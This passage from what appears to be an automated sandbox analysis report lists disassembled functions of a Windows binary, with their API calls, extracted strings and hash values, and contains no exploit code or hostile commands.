                                                                              • API ID: memset$callocfreememmovewcschr$AttributesErrorFileLastqsorttowupperwcsrchr
                                                                              • String ID: &()[]{}^=;!%'+,`~
                                                                              • API String ID: 2516562204-381716982
                                                                              • Opcode ID: 46497fca5754c6479966f60d4708fe0825c75a770e24346d8a6fbe1751f9d7e4
                                                                              • Instruction ID: 211b30b173a4214a734e05e79fd2719b80311f746e285ad1d019110f38af25d2
                                                                              • Opcode Fuzzy Hash: 46497fca5754c6479966f60d4708fe0825c75a770e24346d8a6fbe1751f9d7e4
                                                                              • Instruction Fuzzy Hash: 29C1AD72A09791C6EB58BF25E8402BEB7A0FB48B94F445125DE9D83BA9DF3CE451C700
                                                                              Function 00007FF64B577E80 Relevance: 14.2, APIs: 7, Strings: 1, Instructions: 210COMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                                • Part of subcall function 00007FF64B56D3F0: GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0 ref: 00007FF64B56D46E
                                                                                • Part of subcall function 00007FF64B56D3F0: HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0 ref: 00007FF64B56D485
                                                                                • Part of subcall function 00007FF64B56D3F0: wcschr.MSVCRT ref: 00007FF64B56D4EE
                                                                                • Part of subcall function 00007FF64B56D3F0: iswspace.MSVCRT ref: 00007FF64B56D54D
                                                                                • Part of subcall function 00007FF64B56D3F0: wcschr.MSVCRT ref: 00007FF64B56D569
                                                                                • Part of subcall function 00007FF64B56D3F0: wcschr.MSVCRT ref: 00007FF64B56D58C
                                                                              • iswspace.MSVCRT ref: 00007FF64B577EEE
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000008.00000002.1265026062.00007FF64B561000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF64B560000, based on PE: true
                                                                              • Associated: 00000008.00000002.1265012192.00007FF64B560000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000008.00000002.1265049668.00007FF64B592000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000008.00000002.1265065661.00007FF64B59D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000008.00000002.1265065661.00007FF64B5AF000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000008.00000002.1265122342.00007FF64B5B9000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_8_2_7ff64b560000_alpha.jbxd
                                                                              Similarity
                                                                              • API ID: wcschr$Heapiswspace$AllocProcess
                                                                              • String ID: A
                                                                              • API String ID: 3731854180-3554254475
                                                                              • Opcode ID: 41f65c48cf3e37159ed1ee97e5992bf17c61e45d372bd9afbfce449b4f210755
                                                                              • Instruction ID: 944ccc4c5e5ff95b66b1848ee07d77a9172d2b8be708d5785fb7f8d02a9f339e
                                                                              • Opcode Fuzzy Hash: 41f65c48cf3e37159ed1ee97e5992bf17c61e45d372bd9afbfce449b4f210755
                                                                              • Instruction Fuzzy Hash: 54A17E21A0D68289E668BF21E850679FAA0FF4D790F048034CA6DC77B6DF7CE451CB10
                                                                              Function 00007FF64B58A39C Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 111libraryloaderCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000008.00000002.1265026062.00007FF64B561000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF64B560000, based on PE: true
                                                                              • Associated: 00000008.00000002.1265012192.00007FF64B560000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000008.00000002.1265049668.00007FF64B592000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000008.00000002.1265065661.00007FF64B59D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000008.00000002.1265065661.00007FF64B5AF000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000008.00000002.1265122342.00007FF64B5B9000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_8_2_7ff64b560000_alpha.jbxd
                                                                              Similarity
                                                                              • API ID: MemoryProcessRead$AddressLibraryLoadProc
                                                                              • String ID: NTDLL.DLL$NtQueryInformationProcess
                                                                              • API String ID: 1580871199-2613899276
                                                                              • Opcode ID: 248bfccf7fce2d74e04c554d0a409a3469e52293056c2e4adbebd786e6cf1904
                                                                              • Instruction ID: 4ce8c4ae148f1cbf121a21d311dffeeb487166b0435f4bb2608ad32a17fdde6d
                                                                              • Opcode Fuzzy Hash: 248bfccf7fce2d74e04c554d0a409a3469e52293056c2e4adbebd786e6cf1904
                                                                              • Instruction Fuzzy Hash: 42514C71A2DB82C6EB54BF15E800269A7A4FF88B84F445135DA6E83B65DF3CD452CB00
                                                                              Function 00007FF64B567420 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 101fileCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000008.00000002.1265026062.00007FF64B561000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF64B560000, based on PE: true
                                                                              • Associated: 00000008.00000002.1265012192.00007FF64B560000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000008.00000002.1265049668.00007FF64B592000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000008.00000002.1265065661.00007FF64B59D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000008.00000002.1265065661.00007FF64B5AF000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000008.00000002.1265122342.00007FF64B5B9000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_8_2_7ff64b560000_alpha.jbxd
                                                                              Similarity
                                                                              • API ID: CloseCreateFileHandle_open_osfhandle_wcsicmp
                                                                              • String ID: con
                                                                              • API String ID: 689241570-4257191772
                                                                              • Opcode ID: c7a2234d9573f6b473384a9ead2fa3a6435853c7d94b0c157743cf5a0c0f015b
                                                                              • Instruction ID: fdc760adeb21f4d06ae4c9c4a532353b011b78572c0921344f58a3d0e38f1480
                                                                              • Opcode Fuzzy Hash: c7a2234d9573f6b473384a9ead2fa3a6435853c7d94b0c157743cf5a0c0f015b
                                                                              • Instruction Fuzzy Hash: F0415922A1CA45C6E214BF15E444379BAA1FB8DBA5F558334DE3D837A1CF39D8498B40
                                                                              Function 00007FF64B58A58C Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 97memoryfileCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000008.00000002.1265026062.00007FF64B561000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF64B560000, based on PE: true
                                                                              • Associated: 00000008.00000002.1265012192.00007FF64B560000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000008.00000002.1265049668.00007FF64B592000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000008.00000002.1265065661.00007FF64B59D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000008.00000002.1265065661.00007FF64B5AF000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000008.00000002.1265122342.00007FF64B5B9000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_8_2_7ff64b560000_alpha.jbxd
                                                                              Similarity
                                                                              • API ID: Heap$File$Process$AllocCloseCreateFreeHandlePointerRead
                                                                              • String ID: PE
                                                                              • API String ID: 2941894976-4258593460
                                                                              • Opcode ID: 331757eb63d1f0c0e0f6f41cd200ca790172e856099f574e6941fdd4e3218fed
                                                                              • Instruction ID: 8b5d6ea1ef4fd0f83e115c4e263c798b5c760fe2c9008356d02d12bd3d31bf77
                                                                              • Opcode Fuzzy Hash: 331757eb63d1f0c0e0f6f41cd200ca790172e856099f574e6941fdd4e3218fed
                                                                              • Instruction Fuzzy Hash: 26412161A1C69186E668BF12E410279F6A0FF8DB90F445130DA6DC3BAADF3CE556CB10
                                                                              Function 00007FF64B570010 Relevance: 13.7, APIs: 9, Instructions: 163fileCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • SetFilePointer.API-MS-WIN-CORE-FILE-L1-1-0(00000000,00000000,0000237B,00000000,00000002,0000000A,00000001,00007FF64B58849D,?,?,?,00007FF64B58F0C7), ref: 00007FF64B570045
                                                                              • AcquireSRWLockShared.API-MS-WIN-CORE-SYNCH-L1-1-0(?,?,?,00007FF64B58F0C7,?,?,?,?,?,?,00000002,00000000,?,?,0000002F,00007FF64B58E964), ref: 00007FF64B570071
                                                                              • ReadFile.API-MS-WIN-CORE-FILE-L1-1-0 ref: 00007FF64B570092
                                                                              • ReleaseSRWLockShared.API-MS-WIN-CORE-SYNCH-L1-1-0 ref: 00007FF64B5700A7
                                                                              • SetFilePointer.API-MS-WIN-CORE-FILE-L1-1-0 ref: 00007FF64B570148
                                                                              • MultiByteToWideChar.API-MS-WIN-CORE-STRING-L1-1-0 ref: 00007FF64B570181
                                                                              Memory Dump Source
                                                                              • Source File: 00000008.00000002.1265026062.00007FF64B561000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF64B560000, based on PE: true
                                                                              • Associated: 00000008.00000002.1265012192.00007FF64B560000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000008.00000002.1265049668.00007FF64B592000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000008.00000002.1265065661.00007FF64B59D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000008.00000002.1265065661.00007FF64B5AF000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000008.00000002.1265122342.00007FF64B5B9000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_8_2_7ff64b560000_alpha.jbxd
                                                                              Similarity
                                                                              • API ID: File$LockPointerShared$AcquireByteCharMultiReadReleaseWide
                                                                              • String ID:
                                                                              • API String ID: 734197835-0
                                                                              • Opcode ID: 6daa823d36a278c72bc8dcf2d42bf9926b6fb5b8f0ec4fad86b12d1df65ba387
                                                                              • Instruction ID: 9b29a7bbf822d07d32fbcf15b97f6098d095085ff12a4a70b098fea6f53f12e9
                                                                              • Opcode Fuzzy Hash: 6daa823d36a278c72bc8dcf2d42bf9926b6fb5b8f0ec4fad86b12d1df65ba387
                                                                              • Instruction Fuzzy Hash: D3618271A1C692C6E728BF65E804379FAD1BB4D754F488131D96E827B2DFBCA445CB00
                                                                              Function 00007FF64B589B0C Relevance: 12.5, APIs: 4, Strings: 3, Instructions: 261registryCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000008.00000002.1265026062.00007FF64B561000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF64B560000, based on PE: true
                                                                              • Associated: 00000008.00000002.1265012192.00007FF64B560000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000008.00000002.1265049668.00007FF64B592000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000008.00000002.1265065661.00007FF64B59D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000008.00000002.1265065661.00007FF64B5AF000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000008.00000002.1265122342.00007FF64B5B9000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_8_2_7ff64b560000_alpha.jbxd
                                                                              Similarity
                                                                              • API ID: Enum$Openwcsrchr
                                                                              • String ID: %s=%s$.$\Shell\Open\Command
                                                                              • API String ID: 3402383852-1459555574
                                                                              • Opcode ID: c43f82accf2197ad62986fa4fadf1decf1ac45d35886ea9e70cf93cd770afeea
                                                                              • Instruction ID: 6e1e48c013b713cfcedf50d64198c0d92254c0db2fd98f2956ad351da524a718
                                                                              • Opcode Fuzzy Hash: c43f82accf2197ad62986fa4fadf1decf1ac45d35886ea9e70cf93cd770afeea
                                                                              • Instruction Fuzzy Hash: 41A1E261A1D64282FE18BF54D0002BAF3A1EF9CB90F405131DA6E877A6EE7DE911C300
                                                                              Function 00007FF64B561F90 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 174COMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000008.00000002.1265026062.00007FF64B561000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF64B560000, based on PE: true
                                                                              • Associated: 00000008.00000002.1265012192.00007FF64B560000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000008.00000002.1265049668.00007FF64B592000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000008.00000002.1265065661.00007FF64B59D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000008.00000002.1265065661.00007FF64B5AF000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000008.00000002.1265122342.00007FF64B5B9000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_8_2_7ff64b560000_alpha.jbxd
                                                                              Similarity
                                                                              • API ID: memset$EnvironmentVariable
                                                                              • String ID: DIRCMD
                                                                              • API String ID: 1405722092-1465291664
                                                                              • Opcode ID: ffb8ac6f460930c1464a251cfe4f6a37909ed3687fd59a2300d1627ea223b7d7
                                                                              • Instruction ID: 91777e24919b52e11917e8627fb64b80f994fbb67b9f00086919a81d8bd0f243
                                                                              • Opcode Fuzzy Hash: ffb8ac6f460930c1464a251cfe4f6a37909ed3687fd59a2300d1627ea223b7d7
                                                                              • Instruction Fuzzy Hash: E2816172B19BC18AEB24EF61E8402ED77A4FB49748F005139DA5D97B6ADF38D145C700
                                                                              Function 00007FF64B58BA40 Relevance: 12.4, APIs: 5, Strings: 2, Instructions: 103COMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000008.00000002.1265026062.00007FF64B561000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF64B560000, based on PE: true
                                                                              • Associated: 00000008.00000002.1265012192.00007FF64B560000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000008.00000002.1265049668.00007FF64B592000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000008.00000002.1265065661.00007FF64B59D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000008.00000002.1265065661.00007FF64B5AF000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000008.00000002.1265122342.00007FF64B5B9000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_8_2_7ff64b560000_alpha.jbxd
                                                                              Similarity
                                                                              • API ID: ErrorLast$InformationVolumeiswalphatowupper
                                                                              • String ID: %04X-%04X$:
                                                                              • API String ID: 930873262-1938371929
                                                                              • Opcode ID: 1b48387342add1d7daed67bb80fe16c2eacc5f7ab2e1033d601e8994222be5e6
                                                                              • Instruction ID: 19304b100418724ad7794974d2d04af6421d3855dbcac32e54a8dbda440fc82f
                                                                              • Opcode Fuzzy Hash: 1b48387342add1d7daed67bb80fe16c2eacc5f7ab2e1033d601e8994222be5e6
                                                                              • Instruction Fuzzy Hash: 7C418D61A1CA82C2EB28BF64E4412BAE3A4FB8C715F408135DA6E836F6DF7DD545C710
                                                                              Function 00007FF64B58D878 Relevance: 12.1, APIs: 8, Instructions: 89fileCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              Memory Dump Source
                                                                              • Source File: 00000008.00000002.1265026062.00007FF64B561000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF64B560000, based on PE: true
                                                                              • Associated: 00000008.00000002.1265012192.00007FF64B560000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000008.00000002.1265049668.00007FF64B592000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000008.00000002.1265065661.00007FF64B59D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000008.00000002.1265065661.00007FF64B5AF000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000008.00000002.1265122342.00007FF64B5B9000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_8_2_7ff64b560000_alpha.jbxd
                                                                              Similarity
                                                                              • API ID: File_get_osfhandle$Pointer$BuffersFlushRead
                                                                              • String ID:
                                                                              • API String ID: 3192234081-0
                                                                              • Opcode ID: 21cbebea3a03736acc453a065156524b21459c684ab1bf839b7458faa090dfc7
                                                                              • Instruction ID: 74c055180e41be7d18d1529c8785e8ff3faaf285e8dc6dbfd362a64be6a26bdf
                                                                              • Opcode Fuzzy Hash: 21cbebea3a03736acc453a065156524b21459c684ab1bf839b7458faa090dfc7
                                                                              • Instruction Fuzzy Hash: 7E313B31A1C652DBE718BF21E44467DEAA1FB8DB90F449634DE6A877B6CE3CD4058B00
                                                                              Function 00007FF64B5786F0 Relevance: 10.7, APIs: 7, Instructions: 154COMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              Memory Dump Source
                                                                              • Source File: 00000008.00000002.1265026062.00007FF64B561000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF64B560000, based on PE: true
                                                                              • Associated: 00000008.00000002.1265012192.00007FF64B560000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000008.00000002.1265049668.00007FF64B592000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000008.00000002.1265065661.00007FF64B59D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000008.00000002.1265065661.00007FF64B5AF000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000008.00000002.1265122342.00007FF64B5B9000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_8_2_7ff64b560000_alpha.jbxd
                                                                              Similarity
                                                                              • API ID: ConsoleErrorOpenTitleTokenwcsstr$CloseFormatFreeLastLocalMessageProcessStatusThread
                                                                              • String ID:
                                                                              • API String ID: 1313749407-0
                                                                              • Opcode ID: ee6218c461c646e929341b9db92bfc99d61f95d83b881389c5cff3e0ca217c2e
                                                                              • Instruction ID: 097392081cbb42c20f789f0ae6a644f2a378e282227ce7832cb10d0500334815
                                                                              • Opcode Fuzzy Hash: ee6218c461c646e929341b9db92bfc99d61f95d83b881389c5cff3e0ca217c2e
                                                                              • Instruction Fuzzy Hash: 2F51A161B1D68282EA58BF16E814179E691BF4DB90F489134DE7F873F2DFBCE8418200
                                                                              Function 00007FF64B58EC14 Relevance: 10.6, APIs: 7, Instructions: 121COMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              Memory Dump Source
                                                                              • Source File: 00000008.00000002.1265026062.00007FF64B561000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF64B560000, based on PE: true
                                                                              • Associated: 00000008.00000002.1265012192.00007FF64B560000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000008.00000002.1265049668.00007FF64B592000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000008.00000002.1265065661.00007FF64B59D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000008.00000002.1265065661.00007FF64B5AF000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000008.00000002.1265122342.00007FF64B5B9000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_8_2_7ff64b560000_alpha.jbxd
                                                                              Similarity
                                                                              • API ID: Error$CurrentDirectoryModememset$EnvironmentLastVariable
                                                                              • String ID:
                                                                              • API String ID: 920682188-0
                                                                              • Opcode ID: 709d1c67be100917fc71fda4c7ad07296061441c4da44e249bcfadc6653ab77c
                                                                              • Instruction ID: c77dc8c6325f9ae989c3136d85b520d29dab9da41a976afd4a46c24417788fb9
                                                                              • Opcode Fuzzy Hash: 709d1c67be100917fc71fda4c7ad07296061441c4da44e249bcfadc6653ab77c
                                                                              • Instruction Fuzzy Hash: 5F512872709B818AEB29EF24D8542E8B7A1FB8CB44F049139CA5D87765EF3CD6598700
                                                                              Function 00007FF64B571FAC Relevance: 9.3, APIs: 6, Instructions: 260COMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              Memory Dump Source
                                                                              • Source File: 00000008.00000002.1265026062.00007FF64B561000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF64B560000, based on PE: true
                                                                              • Associated: 00000008.00000002.1265012192.00007FF64B560000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000008.00000002.1265049668.00007FF64B592000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000008.00000002.1265065661.00007FF64B59D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000008.00000002.1265065661.00007FF64B5AF000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000008.00000002.1265122342.00007FF64B5B9000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_8_2_7ff64b560000_alpha.jbxd
                                                                              Similarity
                                                                              • API ID: memsetwcsspn
                                                                              • String ID:
                                                                              • API String ID: 3809306610-0
                                                                              • Opcode ID: 231042d871709e842a58ac96de8cecde88a4784088973e8bd81687bc68b42317
                                                                              • Instruction ID: 8053b9688e9837133bae0fb8a91e5908be2e73fa4f9b840cbe656448b9b59e72
                                                                              • Opcode Fuzzy Hash: 231042d871709e842a58ac96de8cecde88a4784088973e8bd81687bc68b42317
                                                                              • Instruction Fuzzy Hash: 4DB16D61B0CA4686EA59BF15E450679F7A0FB4DB80F848035DA6E877B2DFBDE441C700
                                                                              Function 00007FF64B588C18 Relevance: 9.1, APIs: 6, Instructions: 145COMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              Memory Dump Source
                                                                              • Source File: 00000008.00000002.1265026062.00007FF64B561000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF64B560000, based on PE: true
                                                                              • Associated: 00000008.00000002.1265012192.00007FF64B560000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000008.00000002.1265049668.00007FF64B592000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000008.00000002.1265065661.00007FF64B59D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000008.00000002.1265065661.00007FF64B5AF000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000008.00000002.1265122342.00007FF64B5B9000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_8_2_7ff64b560000_alpha.jbxd
                                                                              Similarity
                                                                              • API ID: wcschr$iswdigit$wcstol
                                                                              • String ID:
                                                                              • API String ID: 3841054028-0
                                                                              • Opcode ID: c8e66ebebd8934775a16318260a5522f8ecbc9a094cbada97be1ab4c749f477c
                                                                              • Instruction ID: 4968c4ca9d554bc1ca58a22e2b46ba42214ac0d20a9d82962b6878e0964b87fd
                                                                              • Opcode Fuzzy Hash: c8e66ebebd8934775a16318260a5522f8ecbc9a094cbada97be1ab4c749f477c
                                                                              • Instruction Fuzzy Hash: 2D51A566A2D652C1F768BF15D4001B9B6A2FF6C790B448131DE7D822F6EF3CA461C210
                                                                              Function 00007FF64B565984 Relevance: 9.1, APIs: 6, Instructions: 142COMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • _get_osfhandle.MSVCRT ref: 00007FF64B583687
                                                                              • WriteConsoleW.API-MS-WIN-CORE-CONSOLE-L1-1-0(?,00000000,00008000,?,00000001,00007FF64B56260D), ref: 00007FF64B5836A6
                                                                              • SetConsoleMode.API-MS-WIN-CORE-CONSOLE-L1-1-0(?,00000000,00008000,?,00000001,00007FF64B56260D), ref: 00007FF64B5836EB
                                                                              • _get_osfhandle.MSVCRT ref: 00007FF64B583703
                                                                              • WriteConsoleW.API-MS-WIN-CORE-CONSOLE-L1-1-0(?,00000000,00008000,?,00000001,00007FF64B56260D), ref: 00007FF64B583722
                                                                              Memory Dump Source
                                                                              • Source File: 00000008.00000002.1265026062.00007FF64B561000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF64B560000, based on PE: true
                                                                              • Associated: 00000008.00000002.1265012192.00007FF64B560000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000008.00000002.1265049668.00007FF64B592000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000008.00000002.1265065661.00007FF64B59D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000008.00000002.1265065661.00007FF64B5AF000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000008.00000002.1265122342.00007FF64B5B9000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_8_2_7ff64b560000_alpha.jbxd
                                                                              Similarity
                                                                              • API ID: Console$Write_get_osfhandle$Mode
                                                                              • String ID:
                                                                              • API String ID: 1066134489-0
                                                                              • Opcode ID: 4c1f695bad35c7bf589eba106c736ecb6e681f2494b966e2c9ca81186bfba4b7
                                                                              • Instruction ID: d2f3fe39f1a3849d5dd5f99a814425f95fe5bf3bf0ad67a7227b67b8babb515c
                                                                              • Opcode Fuzzy Hash: 4c1f695bad35c7bf589eba106c736ecb6e681f2494b966e2c9ca81186bfba4b7
                                                                              • Instruction Fuzzy Hash: 24517E61B1C64296EA287F26E50457AE6A1EF5CB90F085435EE2EC37B2DF7CE4518B00
                                                                              Function 00007FF64B5736EC Relevance: 9.1, APIs: 6, Instructions: 93fileCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              Memory Dump Source
                                                                              • Source File: 00000008.00000002.1265026062.00007FF64B561000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF64B560000, based on PE: true
                                                                              • Associated: 00000008.00000002.1265012192.00007FF64B560000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000008.00000002.1265049668.00007FF64B592000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000008.00000002.1265065661.00007FF64B59D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000008.00000002.1265065661.00007FF64B5AF000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000008.00000002.1265122342.00007FF64B5B9000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_8_2_7ff64b560000_alpha.jbxd
                                                                              Similarity
                                                                              • API ID: FileWrite$ByteCharMultiWide$_get_osfhandle
                                                                              • String ID:
                                                                              • API String ID: 3249344982-0
                                                                              • Opcode ID: 51d05573790b3cf5d3d64b049944166340f1b2bbc10c5d821001f089b8cff74b
                                                                              • Instruction ID: ad4407e9dc4dd4f2f322fc402825ae5eea40b01ec33923a5a19b0a19bc3833a2
                                                                              • Opcode Fuzzy Hash: 51d05573790b3cf5d3d64b049944166340f1b2bbc10c5d821001f089b8cff74b
                                                                              • Instruction Fuzzy Hash: AE414C72A1CB41C6E314BF12E844369FAA4FB9DB94F448234DA5A877B5CF7CD1158B00
                                                                              Function 00007FF64B5734A0 Relevance: 9.1, APIs: 6, Instructions: 84COMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                                • Part of subcall function 00007FF64B573578: _get_osfhandle.MSVCRT ref: 00007FF64B573584
                                                                                • Part of subcall function 00007FF64B573578: GetFileType.API-MS-WIN-CORE-FILE-L1-1-0(?,?,00000014,00007FF64B5632E8,?,?,?,?,?,?,?,?,?,?,00000000,00000014), ref: 00007FF64B57359C
                                                                                • Part of subcall function 00007FF64B573578: GetStdHandle.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(?,?,00000014,00007FF64B5632E8,?,?,?,?,?,?,?,?,?,?,00000000,00000014), ref: 00007FF64B5735C3
                                                                                • Part of subcall function 00007FF64B573578: AcquireSRWLockShared.API-MS-WIN-CORE-SYNCH-L1-1-0(?,?,00000014,00007FF64B5632E8,?,?,?,?,?,?,?,?,?,?,00000000,00000014), ref: 00007FF64B5735D9
                                                                                • Part of subcall function 00007FF64B573578: GetConsoleMode.API-MS-WIN-CORE-CONSOLE-L1-1-0(?,?,00000014,00007FF64B5632E8,?,?,?,?,?,?,?,?,?,?,00000000,00000014), ref: 00007FF64B5735ED
                                                                                • Part of subcall function 00007FF64B573578: ReleaseSRWLockShared.API-MS-WIN-CORE-SYNCH-L1-1-0(?,?,00000014,00007FF64B5632E8,?,?,?,?,?,?,?,?,?,?,00000000,00000014), ref: 00007FF64B573602
